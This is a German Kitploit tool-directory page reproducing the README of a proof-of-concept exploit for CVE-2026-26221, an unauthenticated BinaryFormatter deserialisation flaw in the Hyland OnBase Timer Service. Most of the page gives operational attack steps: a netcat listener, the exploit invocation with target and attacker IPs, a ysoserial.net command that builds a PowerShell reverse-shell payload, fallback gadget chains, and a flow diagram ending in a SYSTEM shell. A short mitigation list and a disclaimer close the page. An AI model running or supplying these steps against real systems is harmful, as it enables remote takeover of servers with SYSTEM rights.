Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-26221-Hyland-OnBase-Timer-Service-Unauthenticated-RCE — Proof-of-Concept-Exploit für nicht authentifizierte Remote-Codeausführung im Hyland OnBase Timer Service über .NET-Remoting-BinaryFormatter-Deserialisierung, mit Erlangung von SYSTEM-Berechtigungen. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2026-26221-hyland-onbase-timer-service-unauthenticated-rce
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubmbanyamer/cve-2026-26221-hyland-onbase-timer-service-unauthenticated-rce

CVE-2026-26221-Hyland-OnBase-Timer-Service-Unauthenticated-RCE

Proof-of-Concept-Exploit für nicht authentifizierte Remote-Codeausführung im Hyland OnBase Timer Service über .NET-Remoting-BinaryFormatter-Deserialisierung, mit Erlangung von SYSTEM-Berechtigungen.

Repository anzeigen
vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

📡 Hyland OnBase Timer Service – Unauthenticated RCE

Mohammed Idrees Banyamer

Sicherheitsforscher

Jordanien 🇯🇴

Author Role Country Platform Vulnerability CVE CVSS Status


🧨 Übersicht

Dieses Repository enthält einen Proof‑of‑Concept-Exploit für die Hyland OnBase Timer Service-Schwachstelle, die eine nicht authentifizierte Remote-Codeausführung über unsichere .NET Remoting BinaryFormatter-Deserialisierung ermöglicht.

Die Schwachstelle erlaubt es einem nicht authentifizierten Angreifer, ein manipuliertes BinaryFormatter-Payload an den Timer-Service-Endpunkt zu senden und beliebigen Code als NT AUTHORITY\SYSTEM auszuführen.

  • Produkt: Hyland OnBase Workflow / Workview Timer Service
  • Port: 8900/TCP
  • Authentifizierung: Nicht erforderlich
  • Auswirkung: Remote-Codeausführung
  • Berechtigungen: SYSTEM
  • CVE: CVE‑2026‑26221
  • CVSS: 9.8 (Kritisch)

⚙️ Technische Details

Der Timer Service stellt einen .NET Remoting-Endpunkt bereit:

root@kitploit:~
http://TARGET:8900/TimerServiceAPI.rem

Der Dienst akzeptiert nicht authentifizierte BinaryFormatter-Objekte. Durch die Bereitstellung einer bösartigen Gadget-Kette (ysoserial.net) wird während der Deserialisierung eine beliebige Befehlsausführung ausgelöst.


📦 Anforderungen

  • Python 3
  • requests
  • ysoserial.net
  • netcat-Listener
  • Windows-Payload-Erzeugungsumgebung (Windows / Mono / Wine)

Python-Abhängigkeit installieren:

root@kitploit:~
pip install requests

ysoserial.net herunterladen:

root@kitploit:~
git clone https://github.com/pwntester/ysoserial.net

🚀 Verwendung

1️⃣ Listener starten

root@kitploit:~
nc -lvnp 4444

2️⃣ Exploit ausführen

root@kitploit:~
python3 exploit.py 192.168.10.50 --lhost 192.168.1.100 --lport 4444

3️⃣ Payload erzeugen

Das Skript gibt einen ysoserial-Befehl aus. Führen Sie ihn in einem anderen Terminal aus (Windows / Mono):

root@kitploit:~
ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -c "powershell ..." -o raw > rev_shell.bin

4️⃣ Payload senden

Drücken Sie nach der Payload-Erzeugung die EINGABETASTE im Exploit-Terminal.

Wenn verwundbar → Reverse-Shell verbindet sich.


🧪 Beispiel

root@kitploit:~
python3 exploit.py 10.10.10.123 --lhost 192.168.5.77 --lport 9001

🔧 Optionen

OptionBeschreibung
targetZiel-IP oder Hostname
--portTimer-Service-Port (Standard 8900)
--endpointTimerServiceAPI.rem / TimerServiceEvents.rem
--lhostAngreifer-IP
--lportListener-Port
--gadgetysoserial-Gadget-Kette

🧯 Hinweise

  • Der Exploit ist blind

  • Erfolg = Reverse-Shell-Callback

  • Der Dienst läuft als SYSTEM

  • Bei Blockierung alternative Gadgets versuchen:

    • TextFormattingRunProperties
    • ObjectDataProvider

🛡️ Gegenmaßnahmen

  • Hyland-Sicherheitsadvisory OB2025‑03-Patches anwenden
  • .NET Remoting-Exposition deaktivieren
  • Zugriff auf Port 8900 einschränken
  • BinaryFormatter-Nutzung überwachen

📊 PoC-Angriffsablauf

root@kitploit:~
sequenceDiagram
    participant A as Angreifer
    participant Y as ysoserial.net
    participant T as Ziel OnBase Timer Service
    participant S as SYSTEM-Shell

    A->>A: netcat-Listener starten
    A->>Y: BinaryFormatter-Payload erzeugen
    Y-->>A: rev_shell.bin
    A->>T: HTTP POST /TimerServiceAPI.rem
    T->>T: BinaryFormatter.Deserialize()
    T->>S: Gadget-Kette ausführen
    S-->>A: Reverse-Shell-Verbindung

⚠️ Haftungsausschluss

Dieser Exploit wird bereitgestellt für:

  • Sicherheitsforschung
  • Autorisierte Penetrationstests
  • Defensive Validierung

Die unbefugte Nutzung gegen Systeme, die Sie nicht besitzen oder für die Sie keine Testberechtigung haben, ist illegal.


Tool herunterladen